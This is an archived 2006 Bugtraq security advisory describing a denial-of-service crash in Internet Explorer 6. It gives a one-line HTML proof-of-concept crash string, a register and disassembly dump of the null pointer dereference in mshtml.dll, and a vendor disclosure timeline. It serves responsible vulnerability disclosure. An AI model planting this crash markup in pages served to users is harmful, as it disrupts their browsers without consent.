[BuHa-Security] DoS Vulnerability in MS IE 6 SP2 May 25 2006 10:53PM
bugtraq morph3us org

Hash: RIPEMD160


| BuHa Security-Advisory #12 | May 25th, 2006 |


| Vendor | MS Internet Explorer 6.0 |

| URL | http://www.microsoft.com/windows/ie/ |

| Version | <= 6.0.2900.2180.xpsp_sp2 |

| Risk | Low (Denial of Service) |


o Description:


Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser

made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or

http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Denial of Service: <mshtml.dll>#7d6d2db4


Following HTML code forces MS IE 6 to crash:

> <applet><h4><title> </title><base>



These are the register values and the ASM dump at the time of the access


> eax=00000000 ebx=00000000 ecx=00e78d38 edx=00e7a704 esi=0012a268

> edi=00000000 eip=7d6d2db4 esp=0012a228 ebp=0012a25c


> 7d6d2d7d e868f9ffff call mshtml+0x2226ea (7d6d26ea)

> 7d6d2d82 50 push eax

> 7d6d2d83 e835f8ffff call mshtml+0x2225bd (7d6d25bd)

> 7d6d2d88 85c0 test eax,eax

> 7d6d2d8a 8945f8 mov [ebp-0x8],eax

> 7d6d2d8d 0f85c4020000 jne mshtml+0x223057 (7d6d3057)

> 7d6d2d93 8b461c mov eax,[esi+0x1c]

> 7d6d2d96 8b4e18 mov ecx,[esi+0x18]

> 7d6d2d99 8365f400 and dword ptr [ebp-0xc],0x0

> 7d6d2d9d 8365fc00 and dword ptr [ebp-0x4],0x0

> 7d6d2da1 8b7e14 mov edi,[esi+0x14]

> 7d6d2da4 8945f0 mov [ebp-0x10],eax

> 7d6d2da7 e88462e4ff call mshtml+0x69030 (7d519030)

> 7d6d2dac 3bc7 cmp eax,edi

> 7d6d2dae 0f8402020000 je mshtml+0x222fb6 (7d6d2fb6)

> FAULT ->7d6d2db4 8b07 mov eax,[edi]

> ds:0023:00000000=????????

> 7d6d2db6 8bc8 mov ecx,eax

> 7d6d2db8 83e10f and ecx,0xf

> 7d6d2dbb 49 dec ecx

> 7d6d2dbc 0f849c010000 je mshtml+0x222f5e (7d6d2f5e)

> 7d6d2dc2 49 dec ecx

> 7d6d2dc3 0f84b3000000 je mshtml+0x222e7c (7d6d2e7c)

> 7d6d2dc9 49 dec ecx

> 7d6d2dca 49 dec ecx

> 7d6d2dcb 746c jz mshtml+0x222e39 (7d6d2e39)

> 7d6d2dcd 83e904 sub ecx,0x4

> 7d6d2dd0 0f85a5010000 jne mshtml+0x222f7b (7d6d2f7b)

> 7d6d2dd6 8bcf mov ecx,edi

> 7d6d2dd8 e8482ffeff call mshtml+0x205d25 (7d6b5d25)

> 7d6d2ddd 85c0 test eax,eax

> 7d6d2ddf 7430 jz mshtml+0x222e11 (7d6d2e11)

> 7d6d2de1 837e0400 cmp dword ptr [esi+0x4],0x0

This issue is a non-exploitable Null Pointer Dereference vulnerability and

leads to DoS.

o Vulnerable versions:


The DoS vulnerability was successfully tested on:

> MS IE 6 SP2 - Win XP Pro SP2

> MS IE 6 - Win 2k SP4

o Disclosure Timeline:


xx Feb 06 - Vulnerabilities discovered.

08 Mar 06 - Vendor contacted.

22 Mar 06 - Vendor confirmed vulnerabilities.

25 May 06 - Public release.

o Solution:


I think - this is not an official statement from the Microsoft Security

Response Center - the vulnerability will be fixed in an upcoming service


o Credits:


Thomas Waldegger <bugtraq (at) morph3us (dot) org [email concealed]>

BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel

free to send me a mail. The address 'bugtraq (at) morph3us (dot) org [email concealed]' is more a

spam address than a regular mail address therefore it's possible that

some mails get ignored. Please use the contact details at

http://morph3us.org/ to contact me.

Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all

members of BuHa.

Advisory online: http://morph3us.org/advisories/20060525-msie6-sp2-1.txt

- --

Don't you feel the power of CSS Layouts?

BuHa-Security Community: http://buha.info/board/


Version: n/a

Comment: http://morph3us.org/





[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus